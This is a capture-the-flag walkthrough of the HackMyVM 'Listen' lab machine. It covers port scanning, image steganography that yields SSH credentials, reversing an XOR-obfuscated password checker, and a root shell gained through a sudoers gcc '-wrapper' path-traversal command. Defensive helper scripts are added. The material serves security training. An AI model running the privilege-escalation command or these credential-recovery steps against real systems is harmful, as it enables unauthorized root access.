HackMyVM-Listen 1 1 1-Walkthrough
城南花已开 Lv6

Information gathering

Service detection

```
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.182 08:00:27:1c:a7:f6 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e4:ae:23 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.066 seconds (123.91 hosts/sec). 4 responded
export ip=192.168.60.182
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.182:22
Open 192.168.60.182:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 14:34 CST
Initiating ARP Ping Scan at 14:34
Scanning 192.168.60.182 [1 port]
Completed ARP Ping Scan at 14:34, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:34
Completed Parallel DNS resolution of 1 host. at 14:34, 16.50s elapsed
DNS resolution of 1 IPs took 16.50s. Mode: Async [#: 3, OK: 0, NX: 0, DR: 1, SF: 0, TR: 6, CN: 0]
Initiating SYN Stealth Scan at 14:34
Scanning 192.168.60.182 [2 ports]
Discovered open port 80/tcp on 192.168.60.182
Discovered open port 22/tcp on 192.168.60.182
Completed SYN Stealth Scan at 14:34, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.182
Host is up, received arp-response (0.00055s latency).
Scanned at 2025-02-13 14:34:21 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:1C:A7:F6 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.85 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```

Let's see what kind of site is running on port 80.

It looks like the default nginx page.

But why is the page title Apache2? ❓

```
❯ whatweb -v $ip
WhatWeb report for http://192.168.60.182
Status : 200 OK
Title : Apache2 Ubuntu Default Page: It works
IP : 192.168.60.182
Country : RESERVED, ZZ

Summary : HTTPServer[nginx/1.14.2], nginx[1.14.2]

Detected Plugins:
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

String : nginx/1.14.2 (from server string)

[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.

Version : 1.14.2
Website : http://nginx.net/

HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 13 Feb 2025 06:34:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
```

Directory brute-force, with a response-length filter added.

Nothing came of it, though.

When I requested robots.txt I found that it still lands on this default page.

There is no 404 error or any other response; normally, if a page does not exist, the server returns 404.

Requesting any random path also lands on the default page.

With curl, whatever you request comes back as 200 OK.

But I found a comment hidden at the very end of the response:

```
❯ curl -iv "http://$ip/1fhaskfhla"
* Trying 192.168.60.182:80...
* Connected to 192.168.60.182 (192.168.60.182) port 80
* using HTTP/1.x
> GET /1fhaskfhla HTTP/1.1
> Host: 192.168.60.182
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: nginx/1.14.2
Server: nginx/1.14.2
< Date: Thu, 13 Feb 2025 06:44:02 GMT
Date: Thu, 13 Feb 2025 06:44:02 GMT
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Connection: keep-alive
Connection: keep-alive
<

…………………… (omitted) ……………………

</p>
</div>
</body>
</html>
<!-- Some people always don't understand the format of photos. -->
<!--有些人总是无法理解照片的格式。-->
* Connection #0 to host 192.168.60.182 left intact
```

That is a hint: start from the image format.

I got stuck here; there was no useful information.

I wondered why every requested path ends up at index.php.

My guess was that .htaccess or the Apache configuration had been edited.

curl on .htaccess returns 403 Forbidden, so no access there:

```
❯ curl -iv "http://$ip/.htaccess"
* Trying 192.168.60.182:80...
* Connected to 192.168.60.182 (192.168.60.182) port 80
* using HTTP/1.x
> GET /.htaccess HTTP/1.1
> Host: 192.168.60.182
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
< Server: nginx/1.14.2
Server: nginx/1.14.2
< Date: Thu, 13 Feb 2025 07:40:04 GMT
Date: Thu, 13 Feb 2025 07:40:04 GMT
< Content-Type: text/html
Content-Type: text/html
< Content-Length: 169
Content-Length: 169
< Connection: keep-alive
Connection: keep-alive
<

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>
* Connection #0 to host 192.168.60.182 left intact
```

The group chat gave a hint: you need to find a picture of a cat. I was out of ideas.

Put it aside for now.


The image filename turned out to be in the middle of the page source 😅

I genuinely missed it: I only paid attention to the comment hint at the end, since the comments in the middle are usually Apache's own documentation comments.

Found the cat, haha, it's the group's avatar 🤣
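The lesson from the paragraph above is to enumerate every comment in the source rather than read only the last one. As an added example (not part of the original post), the following Python lists all HTML comments with the line they start on and pulls out every image filename mentioned anywhere in the markup. The sample page is a constructed stand-in: the trailing comment is the one quoted in the post, the image names are the ones the post downloads, and the wording of the middle comment is assumed.

```python
from html.parser import HTMLParser
import re

# Constructed stand-in for the page source (the real Apache default page is far
# longer). The trailing comment is quoted in the post; the middle comment's
# wording is assumed, only the image filenames come from the post.
SAMPLE_HTML = """<!DOCTYPE html>
<html>
<head><title>Apache2 Ubuntu Default Page: It works</title></head>
<body>
<div class="main_page">
  <!--
    Modified from the original index.html shipped with Apache2 (constructed).
    Assets: 117db0148dc179a2c2245c5a30e63ab0.jpg 117db0148dc179a2c2245c5a30e63ab0.png
  -->
  <p>It works!</p>
</div>
</body>
</html>
<!-- Some people always don't understand the format of photos. -->
"""


class CommentCollector(HTMLParser):
    """Collects every <!-- --> comment together with the line it starts on."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        line, _ = self.getpos()
        # Collapse internal whitespace so multi-line comments print on one line.
        self.comments.append((line, " ".join(data.split())))


def html_comments(html):
    """Return [(line, text), ...] for all comments, first to last."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return parser.comments


IMAGE_RE = re.compile(r"[\w./-]*\.(?:png|jpe?g|gif|bmp|webp)\b", re.IGNORECASE)


def image_refs(html):
    """Image file names mentioned anywhere in the markup, comments included."""
    return sorted(set(IMAGE_RE.findall(html)))


if __name__ == "__main__":
    for line, text in html_comments(SAMPLE_HTML):
        print(f"line {line}: {text[:70]}")
    print(image_refs(SAMPLE_HTML))
```

Run against a saved copy of the real page (`curl -s http://$ip/ > index.html`), `image_refs` would have surfaced both filenames without reading the Apache boilerplate by hand.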

Image steganography

No question about it, this is image steganography.

But there is one jpg and one png, and both formats have their own steganography techniques.

The common CTF trick is hiding a file or something similar inside the image.

wget both images:

```
❯ wget http://192.168.60.182/117db0148dc179a2c2245c5a30e63ab0.jpg
--2025-02-15 22:22:37-- http://192.168.60.182/117db0148dc179a2c2245c5a30e63ab0.jpg
Connecting to 192.168.60.182:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 190696 (186K) [image/jpeg]
Saving to: ‘117db0148dc179a2c2245c5a30e63ab0.jpg’

117db0148dc179a2c2245c5a30e63ab0.jpg 100%[=======================================================================>] 186.23K --.-KB/s in 0.01s

2025-02-15 22:22:37 (18.6 MB/s) - ‘117db0148dc179a2c2245c5a30e63ab0.jpg’ saved [190696/190696]
❯ wget http://192.168.60.182/117db0148dc179a2c2245c5a30e63ab0.png
--2025-02-15 22:24:10-- http://192.168.60.182/117db0148dc179a2c2245c5a30e63ab0.png
Connecting to 192.168.60.182:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 379011 (370K) [image/png]
Saving to: ‘117db0148dc179a2c2245c5a30e63ab0.png’

117db0148dc179a2c2245c5a30e63ab0.png 100%[=======================================================================>] 370.13K --.-KB/s in 0.02s

2025-02-15 22:24:10 (19.3 MB/s) - ‘117db0148dc179a2c2245c5a30e63ab0.png’ saved [379011/379011]

❯ zsteg 117db0148dc179a2c2245c5a30e63ab0.jpg

ls -hal 117db0148dc179a2c2245c5a30e63ab0*
-rw-r--r-- 1 Pepster Pepster 187K Feb 13 01:33 117db0148dc179a2c2245c5a30e63ab0.jpg
-rw-r--r-- 1 Pepster Pepster 371K Feb 12 23:55 117db0148dc179a2c2245c5a30e63ab0.png
```

Run zsteg over the png.

It gives a string that looks like a password: morainelake.

```
❯ zsteg 117db0148dc179a2c2245c5a30e63ab0.png
imagedata .. text: "\n\n\n\t\t\t\n\n\n"
b1,rgb,lsb,xy .. text: "morainelake"
b1,bgr,msb,xy .. file: OpenPGP Public Key
b2,r,lsb,xy .. text: "UUUUUUUU@"
b2,g,lsb,xy .. text: "E@UAUUUUUUUUj"
b2,g,msb,xy .. text: "UUUZs-VUU"
b2,b,lsb,xy .. text: "EUUUUUUUUV"
b2,b,msb,xy .. text: "_UUUoUUe"
b3,b,msb,xy .. file: MPEG ADTS, layer I, v2, 96 kbps, Stereo
b3,rgb,lsb,xy .. file: PGP Secret Sub-key -
b4,r,lsb,xy .. text: "DEUTfgww"
b4,r,msb,xy .. text: "M,\"\"\"\"\"\""
b4,g,lsb,xy .. text: ["\"" repeated 10 times]
b4,g,msb,xy .. text: "HDDDDDDDDDDH"
b4,b,lsb,xy .. text: "3\"##2\"\"#33333333333333334DDDDDDDDDD4C333\"\"\""
b4,b,msb,xy .. text: ",\"\"\"\"\"\"\"\"\"\","
```
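The hit that matters above is `b1,rgb,lsb,xy .. text: "morainelake"`. As an added example (not from the post and not zsteg's own code), the Python below models what that descriptor means: one bit per channel sample, the least significant bit, channels visited in R,G,B order, pixels scanned row by row. It embeds the string into a constructed gradient cover, reads it back with the same parameters, and shows that a different channel order yields garbage. The MSB-first packing of extracted bits into bytes is an assumption of this example, not something the post states.

```python
# Added example (not from the post, not zsteg's code): a small model of the
# zsteg descriptor "b1,rgb,lsb,xy", run on a constructed pixel buffer.
#   b1  -> one bit taken from each channel sample
#   lsb -> that bit is the least significant one (msb would be bit 7)
#   rgb -> the three samples of a pixel are visited in R, G, B order
#   xy  -> pixels are scanned row by row
# Assumption of this example: extracted bits are packed into bytes MSB-first.
CHANNEL_INDEX = {"r": 0, "g": 1, "b": 2}


def iter_samples(pixels, order="rgb"):
    """Yield channel samples of a flat 8-bit RGB buffer, pixel by pixel, in `order`."""
    for p in range(0, len(pixels) - len(pixels) % 3, 3):
        for ch in order:
            yield pixels[p + CHANNEL_INDEX[ch]]


def extract_bits(pixels, order="rgb", bit=0, nbytes=None):
    """Collect bit number `bit` of every sample and pack the bits into bytes."""
    out, cur, count = bytearray(), 0, 0
    for sample in iter_samples(pixels, order):
        cur = (cur << 1) | ((sample >> bit) & 1)
        count += 1
        if count == 8:
            out.append(cur)
            cur, count = 0, 0
            if nbytes is not None and len(out) >= nbytes:
                break
    return bytes(out)


def embed_lsb(pixels, payload):
    """Write payload bits (MSB-first) into the LSB of successive samples, R,G,B order."""
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("payload does not fit in the cover")
    out = bytearray(pixels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def printable_run(data, minlen=6):
    """First run of at least `minlen` printable ASCII bytes (what zsteg reports as text)."""
    run = bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= minlen:
            return bytes(run)
        run = bytearray()
    return bytes(run) if len(run) >= minlen else b""


# Constructed 16x16 RGB cover with a plain gradient (not the CTF's png).
WIDTH, HEIGHT = 16, 16
COVER = bytes((16 * x + 40 * c + 3 * y) & 0xFF
              for y in range(HEIGHT) for x in range(WIDTH) for c in range(3))
STEGO = embed_lsb(COVER, b"morainelake\x00")


def recover_text(pixels=STEGO):
    """Replay zsteg's b1,rgb,lsb,xy read and return the printable hit."""
    return printable_run(extract_bits(pixels, "rgb", 0, nbytes=32))


if __name__ == "__main__":
    print(recover_text())                    # b'morainelake'
    print(extract_bits(STEGO, "bgr", 0, 4))  # wrong channel order: garbage
```

The `file:` lines zsteg prints for other bit planes (OpenPGP key, MPEG ADTS) are libmagic matching a few bytes of what is effectively noise; they are usually false positives, while a long run of printable text from a single consistent plane, as here, is the real signal.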

Since the png held hidden information, the jpg surely does too.

Using the password found above yields a secret.zip archive:

```
❯ steghide extract -sf 117db0148dc179a2c2245c5a30e63ab0.jpg
Enter passphrase:
wrote extracted data to "secret.zip".
```

Unpacking it gives SSH login credentials:

```
❯ x secret.zip
extract: extracting to secret
Archive: /home/Pepster/temp/secret.zip
creating: secret/
[/home/Pepster/temp/secret.zip] secret/secret.txt password:
extracting: secret/secret.txt
cat secret/secret.txt
morainelake:660930334
```

User shell

```
❯ ssh [email protected]
The authenticity of host '192.168.60.182 (192.168.60.182)' can't be established.
ED25519 key fingerprint is SHA256:wjUcj6T6r6sq8a/m+aBJnDgmy0hOeMWF04F18Qfae3Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.182' (ED25519) to the list of known hosts.
Welcome to the target machine, enjoy the target machine, hope you have fun
[email protected]'s password:
Linux listen 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb 12 12:30:24 2025 from 192.168.56.110
$ bash
morainelake@listen:~$
```

At this point we have user.

There is a hint in /opt, plus a bit of advertising, haha 🤣

```
morainelake@listen:~$ cd /opt/
morainelake@listen:/opt$ ls -al
total 32
drwxr-xr-x 2 root root 4096 Feb 12 12:13 .
drwxr-xr-x 18 root root 4096 Jan 7 21:50 ..
-rw-r--r-- 1 root root 380 Feb 15 09:30 note.txt
-rwxr-xr-x 1 root root 17088 Feb 12 12:09 reverse
morainelake@listen:/opt$ cat note.txt
Congratulation,you make it.
If you want to learn network security technology,
you can join our exchange group
QQ 660930334
if you know what is QQ.
"Don't worry about failures; worry about the chances you miss when you don't even try. After all, it's better to look back and say, 'I can't believe I did that,' than to look back and say, 'What if?' (You'll probably fail anyway.)"
```

Reversing the reverse binary

There is also an executable; open it in IDA Pro.

We get pseudo-C code.

A quick look at the logic.

Press H to enter coward mode, haha 😅

The hint tells us to reverse an XOR or a substitution.

From the pseudocode, v19 is the XOR value 77, which is 'M' in ASCII.

The first input is compared against v18; XORing v18 with v6 gives the password ll104567.

Working through the rest in the same way gives bamuwe and eviden; the remaining one, v16, comes from XORing v7 with M.

But v7 is a number and cannot be XORed directly as a string: it has to be converted to a char array first, and XORing that gives ta0.

Using a script produced by GPT:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Split a 32-bit integer into its little-endian bytes as a C string.
// 8203321 == 0x7D2C39, so the top byte is 0x00 and the string ends after 3 chars.
void int_to_char_array(unsigned int num, char *str) {
    str[0] = num & 0xFF;         // lowest byte
    str[1] = (num >> 8) & 0xFF;  // second byte
    str[2] = (num >> 16) & 0xFF; // third byte
    str[3] = (num >> 24) & 0xFF; // highest byte
    str[4] = '\0';               // terminator
}

// XOR every character of the string with xor_value (XOR is its own inverse).
void xor_decrypt(char *str, char xor_value) {
    for (size_t i = 0; i < strlen(str); ++i) {
        str[i] = str[i] ^ xor_value;
    }
}

int main(void) {
    unsigned int num = 8203321;   // the integer constant (v7) from the pseudocode
    char xor_value = 'M';         // XOR key: 'M' is ASCII 77 (v19)

    char str[5];                  // 4 bytes + terminating '\0'

    // Convert the integer to its byte string
    int_to_char_array(num, str);
    printf("Converted character array: \"%s\"\n", str);

    // Undo the XOR
    xor_decrypt(str, xor_value);
    printf("Decrypted character array after XOR with '%c': \"%s\"\n", xor_value, str);

    return 0;
}
```

Compile and run it:

```
❯ gcc a.c
❯ ./a.out
Converted character array: "9,}"
Decrypted character array after XOR with 'M': "ta0"
```
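As an added example (not the post's GPT script and not the binary's own code), the Python below generalises the reasoning of this section: each expected password is stored XORed with the single byte 77 ('M'), one of them is packed into the 32-bit integer 8203321 that has to be read back as little-endian bytes, and when the key byte is not obvious from the pseudocode a single-byte XOR can be brute-forced by keeping only keys that yield printable output. The three byte-array constants are reconstructed here by XORing the known passwords; they are illustrative, not dumped from the binary.

```python
# Added example (not the post's script and not the binary's own code).
KEY = 0x4D  # ord('M') == 77, the value the post identifies as v19


def xor_bytes(data, key):
    """Single-byte XOR; applying it twice returns the original (its own inverse)."""
    return bytes(b ^ key for b in data)


def int_to_cstring(value, width=4):
    """Little-endian bytes of `value`, cut at the first NUL, which is exactly
    what the C program's strlen()-based loop sees (0x7D2C39 -> b'9,}')."""
    raw = value.to_bytes(width, "little")
    return raw.split(b"\x00", 1)[0]


def decode_check(stored, key=KEY):
    """Recover the plaintext the binary compares the input against."""
    if isinstance(stored, int):
        stored = int_to_cstring(stored)
    return xor_bytes(stored, key)


def candidate_keys(stored):
    """Keys under which `stored` decodes to printable ASCII: the brute-force
    fallback when the key byte is not visible in the pseudocode."""
    if isinstance(stored, int):
        stored = int_to_cstring(stored)
    return [k for k in range(256) if all(0x20 <= (b ^ k) < 0x7F for b in stored)]


# Constructed stand-ins for the binary's constants: the byte-array ones are
# rebuilt by XORing the known passwords (not dumped from the binary); the
# integer is the value quoted in the post. Order follows the prompts.
STORED_CHECKS = [
    xor_bytes(b"ll104567", KEY),
    xor_bytes(b"bamuwe", KEY),
    8203321,
    xor_bytes(b"eviden", KEY),
]


def recover_passwords(checks=STORED_CHECKS, key=KEY):
    return [decode_check(c, key) for c in checks]


if __name__ == "__main__":
    print(int_to_cstring(8203321))   # b'9,}'
    print(recover_passwords())       # [b'll104567', b'bamuwe', b'ta0', b'eviden']
    print(len(candidate_keys(8203321)), "printable keys; 0x4d included:",
          KEY in candidate_keys(8203321))
```

Because a 3-byte constant leaves many keys that decode to printable text, `candidate_keys` narrows the search rather than settling it; the longer constants (8 bytes for ll104567) prune far harder, so start the brute force on the longest check.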

With the passwords in hand, verify them against the binary:

```
morainelake@listen:/opt$ ./reverse
Enter passwords or Enter H coward mode:
ll104567
bamuwe
ta0
eviden
[+] Enter the password successfully! you know: flower
```

Haha, flower is an easter egg.

Root privilege escalation

Switch user with the passwords in the correct order found above:

```
morainelake@listen:/opt$ su welcome
Password:
$ bash
welcome@listen:/opt$ sudo -l
Matching Defaults entries for welcome on listen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
(ALL : ALL) NOPASSWD: /usr/bin/gcc -wrapper /opt/*
```

We find a sudo rule for gcc.

The * here leaves room to manoeuvre: sudoers matches command-line arguments with a wildcard that also matches `/`, so `/opt/*` matches a path that climbs back out of /opt.

Root shell obtained:

```
welcome@listen:/opt$ sudo  /usr/bin/gcc -wrapper /opt/../bin/sh,-s .
# id
uid=0(root) gid=0(root) groups=0(root)
```
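From the defender's side, the rule above is a sudoers pattern worth catching in an audit. As an added example (not part of the post), the Python below parses sudoers-file syntax (not the `sudo -l` output format) and flags every command argument that contains a glob character, because sudoers matches arguments with fnmatch() and, unlike the command path, lets `*` match `/`. The sample sudoers content is constructed; its last rule mirrors the one `sudo -l` printed here.

```python
import re

# Constructed sample (not the target's real /etc/sudoers); the last rule
# mirrors the one `sudo -l` printed for the welcome user on this box.
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync -a /var/www/ /backup/www/
welcome  ALL=(ALL:ALL) NOPASSWD: /usr/bin/gcc -wrapper /opt/*
"""

# user host=(runas) [TAG: ...] command[, command...]
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
GLOB_CHARS = set("*?[")


def audit_sudoers(text):
    """Return one finding per command argument that contains a glob character.

    sudoers(5): a '/' is not matched by wildcards in the command path, but it
    is matched by wildcards in command-line arguments, so an argument pattern
    such as /opt/* also matches /opt/../bin/sh. Exact argument lists, or a
    root-owned wrapper script that takes no user-controlled path, avoid this.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            parts = cmd.split()
            if not parts or parts[0] == "ALL":
                continue
            binary, args = parts[0], parts[1:]
            for arg in args:
                if GLOB_CHARS & set(arg):
                    findings.append({
                        "user": m.group("user"),
                        "binary": binary,
                        "argument": arg,
                        "nopasswd": nopasswd,
                        "reason": "glob in argument; '*' matches '/', so '..' traversal is possible",
                    })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']}: {f['binary']} {f['argument']} "
              f"(NOPASSWD={f['nopasswd']}) - {f['reason']}")
```

Feed it the output of `sudo cat /etc/sudoers /etc/sudoers.d/*` on a host under review; the rsync rule with fixed paths produces no finding, the gcc rule does.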